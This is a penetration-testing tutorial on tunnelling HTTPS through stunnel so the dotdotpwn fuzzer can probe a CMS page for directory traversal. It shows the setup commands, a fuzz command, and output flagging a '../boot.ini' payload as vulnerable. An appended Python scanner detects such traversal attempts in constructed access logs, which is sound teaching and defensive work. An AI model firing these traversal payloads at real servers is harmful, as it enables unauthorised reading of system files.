http://www.spentera.com/2012/03/directory-traversal-with-dotdotpwn-https-mode/
https://www.stunnel.org/howto.html
Use the stunnel program; stunnel reference: https://www.stunnel.org/index.html
stunnel is a default program on Kali.
It can also be downloaded and installed from https://www.stunnel.org/downloads.html
Building the binary:
1. wget https://www.stunnel.org/downloads/stunnel-5.07.tar.gz
2. tar vxf stunnel-5.07.tar.gz
3. cd stunnel-5.07/
4. ./configure
5. make
6. make install
Generate the SSL PEM file:
root@kali:~# openssl req -new -x509 -days 365 -nodes -out stunnel.pem -keyout stunnel.pem
Configuration:
root@kali:~# cat stunnel.conf
cert = /root/stunnel.pem

#Some security enhancements for UNIX systems - comment them out on Win32
client = yes
#options=NO_SSLv2
debug = 5

; Service-level configuration
[https]
accept = 127.0.0.1:8080
connect = 206.190.36.45:443
[Note] The 206.190.36.45 used here is a Yahoo IP; in a real environment replace it with the IP you need.
Run stunnel:
bash-3.2# stunnel /opt/local/etc/stunnel/stunnel.conf
If there are no errors, no log output is shown.
Verify the HTTPS connection:
root@kali:~# nc 127.0.0.1 8080
GET / HTTP/1.1
Host:yahoo.com

HTTP/1.1 301 Redirect
Date: Wed, 05 Nov 2014 14:24:54 GMT
Via: http/1.1 ir8.fp.gq1.yahoo.com (ApacheTrafficServer)
Server: ATS
Location: https://www.yahoo.com/
Content-Type: text/html
Content-Language: en
Cache-Control: no-store, no-cache
Connection: keep-alive
Content-Length: 1450
Then the dotdotpwn test can be run:
bash-3.2# perl dotdotpwn.pl -m http-url -h 127.0.0.1 -x 8080 -O -s -u http://127.0.0.1:8080/cms/print.php?page=TRAVERSAL -k WINDOWS -b -q

[+] Report name: Reports/127.0.0.1_03-18-2012_23-59.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Detecting Operating System (nmap) ...
[+] Operating System detected:
[+] Protocol: http
[+] Port: 8080
[+] Service detected: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 14640

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Replacing "TRAVERSAL" with the traversals created and sending . .

[*] Testing URL: http://127.0.0.1:8080/cms/print.php?page=../../../../../boot.ini <== VULNERABLE

[+] Fuzz testing finished after 0.08 minutes (5 seconds)
[+] Total Traversals found: 1
[+] Report saved: Reports/127.0.0.1_03-18-2012_23-59.txt
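As an added example (not from the original post and not dotdotpwn's own code), here is the defender's side of a run like the one above: a small Python scanner over constructed Apache access-log lines that decodes the single-encoded, double-encoded and backslash variants the traversal engine generates, records each attempt with its status code, and flags any source that bursts past a threshold. All log lines and addresses are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache-style access-log lines (not real traffic), mirroring what dotdotpwn's
# engine emits: plain ../, %2f-encoded, double-encoded (%252f), backslashes, a %00 suffix.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Mar/2012:23:59:01 +0000] "GET /cms/print.php?page=about HTTP/1.1" 200 512
203.0.113.7 - - [18/Mar/2012:23:59:02 +0000] "GET /cms/print.php?page=../../../../../boot.ini HTTP/1.1" 200 300
203.0.113.7 - - [18/Mar/2012:23:59:02 +0000] "GET /cms/print.php?page=..%2f..%2f..%2fboot.ini HTTP/1.1" 200 300
203.0.113.7 - - [18/Mar/2012:23:59:03 +0000] "GET /cms/print.php?page=..%252f..%252fboot.ini HTTP/1.1" 404 120
203.0.113.7 - - [18/Mar/2012:23:59:03 +0000] "GET /cms/print.php?page=..\\..\\..\\windows\\win.ini%00 HTTP/1.1" 200 200
198.51.100.9 - - [18/Mar/2012:23:59:04 +0000] "GET /cms/index.php HTTP/1.1" 200 900
"""

# client ip, request target and status code from a common/combined log line
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def normalize(target):
    """Percent-decode up to three times (single and double encoding), fold \\ to /."""
    prev, cur = None, target
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/")

def is_traversal(target):
    """True when the decoded request target contains a dot-dot-slash segment."""
    return "../" in normalize(target)

def scan(log_text, burst_threshold=3):
    """Return (hits, noisy): (ip, target, status) per traversal attempt, plus sources
    that made >= burst_threshold attempts (a fuzzer like dotdotpwn sends thousands)."""
    hits, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        if is_traversal(target):
            hits.append((ip, target, int(status)))
            per_ip[ip] += 1
    return hits, {ip: n for ip, n in per_ip.items() if n >= burst_threshold}

if __name__ == "__main__":
    found, noisy = scan(SAMPLE_LOG)
    for ip, target, status in found:
        print("LIKELY SERVED" if status == 200 else "attempt", ip, target)
    print("sources over burst threshold:", noisy)
```

A 200 on a traversal request is the one to look at first, since the server may actually have returned the file; the 404s still count toward the burst total, which is what identifies a fuzzer.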